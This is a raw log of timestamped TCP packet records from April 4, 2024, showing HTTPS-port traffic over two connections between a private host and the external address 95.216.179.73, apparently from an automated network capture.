Apr 4, 2024 17:49:34.015465975 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.015494108 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.015517950 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.030015945 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.030052900 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.030101061 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.030123949 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.030144930 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.030170918 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.049839973 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.049865007 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.049925089 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.049948931 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.049972057 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.049997091 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.067418098 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.067447901 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.067487955 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.067501068 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.067553043 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.067553043 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.082843065 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.082865953 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.082920074 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.082951069 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.082972050 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.083002090 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.099921942 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.099956989 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.099997044 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.100013018 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.100053072 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.100075960 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.113879919 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.113899946 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.113949060 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.113962889 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.113997936 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.114017010 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.128457069 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.128484011 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.128516912 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.128525019 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.128566027 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.128576994 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.135008097 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.135068893 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.135077000 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.135092974 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.135121107 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.135152102 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.293673038 CEST	49783	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.293720961 CEST	443	49783	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.683670998 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.683722019 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:34.683871031 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.684144020 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:34.684154987 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:35.213398933 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:35.213536978 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:35.244308949 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:35.244319916 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:35.244502068 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:35.244515896 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.049786091 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.049829006 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.049854040 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.049864054 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.049884081 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.049922943 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.049957037 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.049964905 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.050010920 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.166486025 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.166511059 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.166564941 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.166570902 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.166606903 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.166620970 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.352555990 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.352581024 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.352641106 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.352649927 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.352682114 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.352698088 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.458461046 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.458492994 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.458580971 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.458580971 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.458587885 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.460479021 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.551043987 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.551074028 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.551284075 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.551284075 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.551291943 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.552233934 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.625987053 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.626013994 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.626056910 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.626064062 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.626105070 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.626105070 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.681075096 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.681102037 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.681191921 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.681200027 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.681221962 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.681392908 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.731925964 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.731935978 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.732237101 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.732254982 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.732312918 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.784447908 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.784471989 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.784532070 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.784539938 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.784770966 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.784770966 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.827970028 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.827995062 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.828063011 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.828069925 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.828093052 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.828141928 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.869465113 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.869509935 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.869558096 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.869565010 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.869585037 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.869605064 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.903661013 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.903697968 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.903734922 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.903739929 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.903779030 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.903804064 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.933056116 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.933098078 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.933161974 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.933167934 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.933199883 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.933248043 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.958338976 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.958365917 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.958468914 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.958481073 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.958626032 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.958626032 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.985711098 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.985733032 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.985815048 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.985821009 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:36.985961914 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:36.985961914 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.007924080 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.007951975 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.007989883 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.008044958 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.008061886 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.008260965 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.032176971 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.032267094 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.032279015 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.032357931 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.052031040 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.052083015 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.052119970 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.052125931 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.052156925 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.052237988 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.071551085 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.071577072 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.071789980 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.071789980 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.071798086 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.071894884 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.093121052 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.093148947 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.093203068 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.093209028 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.093401909 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.093401909 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.110790968 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.110816002 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.111223936 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.111232042 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.111288071 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.130970001 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.130995989 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.131041050 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.131047010 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.131097078 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.131097078 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.147434950 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.147468090 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.147500992 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.147507906 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.147555113 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.164628983 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.164657116 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.164691925 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.164699078 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.164735079 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.164743900 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.181962967 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.181996107 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.182085991 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.182085991 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.182092905 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.182446957 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.196046114 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.196090937 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.196150064 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.196166992 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.196182013 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.196316004 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.209635973 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.209664106 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.209721088 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.209727049 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.209835052 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.209835052 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.223812103 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.223839998 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.223896980 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.223903894 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.223953009 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.238490105 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.238532066 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.238576889 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.238583088 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.238626957 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.250720978 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.250744104 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.250830889 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.250830889 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.250847101 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.250962019 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.264045954 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.264072895 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.264136076 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.264142036 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.264189959 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.264189959 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.276012897 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.276034117 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.276206017 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.276211977 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.276254892 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.286808014 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.286834002 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.287209988 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.287209988 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.287219048 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.287966013 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.298903942 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.298927069 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.299024105 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.299031019 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.299056053 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.299179077 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.308873892 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.308909893 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.309056997 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.309056997 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.309067965 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.309468985 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.319569111 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.319586992 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.319689035 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.319694042 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.319739103 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.329004049 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.329025984 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.329082012 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.329094887 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.329124928 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.329248905 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.339673996 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.339701891 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.339782000 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.339782000 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.339787960 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.340157032 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.349339008 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.349361897 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.349567890 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.349567890 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.349586010 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.350581884 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.358078003 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.358097076 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.358156919 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.358171940 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.358253956 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.358253956 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.367947102 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.367968082 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.368027925 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.368036032 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.368127108 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.368127108 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.376115084 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.376136065 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.376221895 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.376226902 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.376313925 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.376313925 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.384886026 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.384924889 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.385020971 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.385020971 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.385026932 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.385318041 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.392839909 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.392930031 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.392949104 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.393066883 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.401557922 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.401577950 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.401971102 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.401971102 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.401983023 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.402163982 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.411623001 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.411660910 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.411721945 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.411726952 CEST	443	49784	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:37.411919117 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.411920071 CEST	49784	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:37.685319901 CEST	443	49784	95.216.179.73	192.168.2.10
